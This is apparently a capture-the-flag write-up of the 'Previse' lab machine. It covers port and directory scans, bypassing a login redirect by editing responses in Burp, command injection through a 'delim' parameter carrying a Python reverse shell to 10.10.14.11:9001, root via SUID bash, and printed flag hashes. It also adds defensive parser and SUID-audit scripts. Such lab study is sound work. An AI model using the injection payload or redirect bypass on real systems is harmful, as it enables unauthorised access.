Previse - 16.08.2021
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ffuf
Starting ffuf scan
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.11.104:80/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.hta [Status: 403, Size: 277, Words: 20, Lines: 10]
.hta.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
.htaccess.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 302, Size: 2801, Words: 737, Lines: 72]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
css [Status: 301, Size: 310, Words: 20, Lines: 10]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
js [Status: 301, Size: 309, Words: 20, Lines: 10]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
logs.php [Status: 302, Size: 0, Words: 1, Lines: 1]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
status.php [Status: 302, Size: 2968, Words: 749, Lines: 75]
:: Progress: [9228/9228] :: Job [1/1] :: 299 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
Nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.104
+ Target Hostname: 10.10.11.104
+ Target Port: 80
+ Start Time: 2021-08-16 00:00:24 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7889 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2021-08-16 00:09:36 (GMT2) (552 seconds)
Home page
Burp Suite
Redirection: index.php, accounts.php, files.php and status.php all answer with a 302 to login.php, yet the ffuf sizes (2801, 3994, 4914 and 2968 bytes) show that the full page is still sent in the body of the redirect. The server sets the Location header but keeps executing the script and rendering the page. Intercept the response in Burp and change the status line from 302 Found to 200 OK; the browser then renders the page instead of following the redirect.
accounts.php: reachable this way without logging in.
config.php: requested directly it returns 200 with an empty body (Size 0), since PHP executes it server-side and it prints nothing; Nikto flags it as a file likely to hold database credentials.
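The redirect check above, as an added example (not code from the writeup): it parses the ffuf result lines into records, flags redirects that still ship a large body, and rewrites a captured 302 response into a 200 the way the manual Burp edit does. The ffuf lines are copied from the scan above; the 512-byte threshold and the sample raw response are constructed for the example.

```python
import re

# Constructed sample: the relevant result lines copied from the ffuf scan above.
FFUF_OUTPUT = """\
accounts.php            [Status: 302, Size: 3994, Words: 1096, Lines: 94]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
download.php            [Status: 302, Size: 0, Words: 1, Lines: 1]
files.php               [Status: 302, Size: 4914, Words: 1531, Lines: 113]
index.php               [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php               [Status: 200, Size: 2224, Words: 486, Lines: 54]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
logs.php                [Status: 302, Size: 0, Words: 1, Lines: 1]
status.php              [Status: 302, Size: 2968, Words: 749, Lines: 75]
"""

LINE_RE = re.compile(
    r"^(?P<path>\S*)\s*\[Status:\s*(?P<status>\d+),\s*Size:\s*(?P<size>\d+),"
    r"\s*Words:\s*(?P<words>\d+),\s*Lines:\s*(?P<lines>\d+)\]"
)


def parse_ffuf(text):
    """Parse ffuf's default one-hit-per-line output into dicts (non-matching lines are ignored)."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            results.append({"path": d["path"], "status": int(d["status"]),
                            "size": int(d["size"]), "words": int(d["words"]),
                            "lines": int(d["lines"])})
    return results


def leaky_redirects(results, min_size=512):
    """Paths that answer with a 3xx but still carry a body of at least min_size bytes.
    A redirect that does its job needs no body beyond a short stub, so a large one means the
    page behind the redirect was rendered anyway and is worth a look with redirects disabled."""
    return [r["path"] for r in results if 300 <= r["status"] < 400 and r["size"] >= min_size]


def force_200(raw_response):
    """Mimic the Burp edit: rewrite the 3xx status line to 200 OK and drop the Location header,
    leaving the other headers and the body untouched, so a browser renders instead of following."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    version = lines[0].split(b" ", 1)[0]
    kept = [l for l in lines[1:] if not l.lower().startswith(b"location:")]
    return b"\r\n".join([version + b" 200 OK"] + kept) + sep + body


if __name__ == "__main__":
    for path in leaky_redirects(parse_ffuf(FFUF_OUTPUT)):
        print("3xx with a full body:", path)
```

With the scan above this lists accounts.php, files.php, index.php and status.php; download.php, logout.php and logs.php redirect with an empty body and are not flagged. Burp's "Match and Replace" rule on the response status line automates the same edit as force_200 for every response.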
The delim parameter is vulnerable to command injection: the ';' after the expected value comma ends the delimiter argument and everything after it is run as a second shell command. The payload used here is a Python reverse shell connecting back to 10.10.14.11:9001 (a listener must already be waiting on that port).
As sent, URL-encoded:
delim=comma;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.11",9001))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'
Decoded:
delim=comma;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Privilege Escalation
SUID
/bin/bash carries the SUID bit. bash drops an effective uid that differs from the real uid unless it is started with -p, so it has to be run as bash -p to keep euid 0; id then confirms the elevated effective uid while the real uid stays www-data:
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
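A SUID audit in Python, as an added example (not part of the writeup): it walks the filesystem, reports root-owned SUID files that are not in a known-good baseline, and includes a self-check on a throw-away directory. The baseline set is an assumed, illustrative list for a stock Ubuntu 18.04 host, not taken from the target; build the real one from a clean reference machine.

```python
import os
import stat
import tempfile

# Assumed baseline of SUID binaries normally present on a stock Ubuntu 18.04 system.
# Illustrative only; generate the real baseline from a clean reference host.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount", "/bin/fusermount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/traceroute6.iputils",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
}


def is_suid_mode(mode):
    """True for a regular file whose mode carries the set-user-ID bit."""
    return bool(stat.S_ISREG(mode) and mode & stat.S_ISUID)


def is_suid(path):
    try:
        return is_suid_mode(os.lstat(path).st_mode)  # lstat: a symlink never counts
    except OSError:
        return False


def find_suid(root="/"):
    """Walk the tree (skipping pseudo filesystems) and return (path, owner uid) per SUID file."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath in ("/proc", "/sys", "/dev", "/run"):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_mode(st.st_mode):
                hits.append((path, st.st_uid))
    return sorted(hits)


def unexpected_suid(hits, baseline=BASELINE, owner_uid=0):
    """SUID files owned by owner_uid that are not in the baseline. A root-owned /bin/bash
    lands here; `bash -p` on it keeps euid 0, while plain `bash` drops the privilege."""
    return [path for path, uid in hits if uid == owner_uid and path not in baseline]


def self_check():
    """Constructed scenario: a temporary directory with one SUID file and one plain file,
    owned by the current user, so the scan can be exercised without root."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_file = os.path.join(tmp, "fake_suid")
        plain_file = os.path.join(tmp, "plain")
        for p in (suid_file, plain_file):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\nid\n")
        os.chmod(plain_file, 0o755)
        try:
            os.chmod(suid_file, 0o4755)
        except OSError:
            pass  # some filesystems refuse the bit; bit_set below records what actually stuck
        bit_set = is_suid(suid_file)
        flagged = unexpected_suid(find_suid(tmp), baseline=set(), owner_uid=os.getuid())
        return {"bit_set": bit_set, "flagged": [os.path.basename(p) for p in flagged]}


if __name__ == "__main__":
    for path in unexpected_suid(find_suid("/")):
        print("unexpected root-owned SUID file:", path)
```

On the box in this writeup the scan would print /bin/bash. The same list is what a defender should diff against the baseline on a schedule: a shell appearing with mode 4755 is a persistence mechanism, not a configuration choice.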
user.txt
b2882ebd87e192d549bd001610313ad3
root.txt
47c75b9d5e0ade166981d0b5823b47e1